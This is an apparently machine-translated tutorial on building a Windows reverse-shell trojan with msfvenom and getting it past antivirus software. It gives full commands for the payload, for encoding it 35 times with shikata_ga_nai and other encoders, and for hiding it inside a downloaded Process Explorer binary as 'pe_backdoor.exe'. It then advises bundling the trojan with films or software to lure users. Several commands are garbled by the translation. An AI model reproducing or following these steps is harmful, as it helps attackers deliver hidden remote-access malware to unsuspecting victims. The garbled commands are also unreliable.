Most antivirus software uses signatures to identify malicious code. Signature in the antivirus engines to scan the disk and the matching process.
In order to avoid anti-virus software, you can create a unique signature for the attack load, it does not match the signature of any antivirus software.
When the direct penetration, metasploit attack load can run only in memory, not to write any data to the hard disk, we attack after attack and upload load, most antivirus software can not detect it.
1. MSF attack load generator operable to create two separate commands to get Trojan
msfvenom -p windows/shell_reverse_tcp --payload-options
msfvenom -p windows / shell_reverse_tcp LHOST = 192.168.1.140 (your IP) LPORT = 31337 (own port) -f -exe -o payload1.exe
A windows PE files (Portable Executable) Trojan
2. One of the best ways to avoid detection of anti-virus software, using encoder MSF
To Baidu antivirus as an example. Before actual deployment on the target attacks loads, we need to understand anti-virus program objectives, to ensure the smooth running of the Trojan
Use MSF encoder to re-encode the Trojan file. It can change the shape of the code in the executable file. E-mail attachments and base64 encoding similar.
When this file is run, MSF encoder will decode the original program into memory and executed.
msfvenom -l encoders
Select different environments (such as x86, linux, PPC, etc.) encoding format, different formats for different operating system platforms. For example 64-bit win 7 with x64,32 with win7 x86.
Windows -p msfvenom / shell_reverse_tcp lhost = 192.168.1.140 LPORT -e x86 = 31337 / shikata_ga NAI [Note that focus encoder x86 Parameters -f exe -o payload2.exe
The payload2.exe take Baidu antivirus detect it, could not escape detection antivirus software. This requires constant coding, coding or more gradually to temptation.
We continue to encode the file, antivirus software and then regularly update the virus database, so that it can detect the file after encoding.
Above, we use the argument shikata_ga_nai coding technology , it sometimes can escape, sometimes not escape.
Here, we further multiply the Trojan code, the following command
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.140 LPORT=31337 -e x86/shikata_ga nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a -x86 --platform windows -i 10 -f exe -o payload3.exe
Here we performed a total of 35 coded attack load, it may still be unable to successfully evade anti-virus detection software.
Custom executable module
Typically, when running msfvenom command, the attack to the default payload is embedded in the executable file template, the default template files data / templates / template.exe. It will always be the object of antivirus software vendors when updating antivirus software focus. We do not use this template the default.
Microsoft's program as an executable program custom template.
wget http://download.sysinternals.com/files/ProcessExplorer.zip
unzip ../ProcessExplorer.zip
msfvenom -p windows / shell_reverse_tcp LHOST = 192.168.1.140 LPORT 8080 = -e x86 / x work shikata_ga_nai / 5 procexp.exe -i -o -f exe /ver/www/pe_backdoor.exe
Download process explorer software, extract, use the -x parameter to specify the process explorer binary files as our custom template.
This time, there is a very big chance, antivirus software can not detect.
When the user runs this backdoor attack executable files like we just generated, nothing has happened, which can cause users suspect. Usually tied to other films, software, plug-in and other things which attract users. How binding it is easy, but also a command to get it up here in the end, do not continue to write.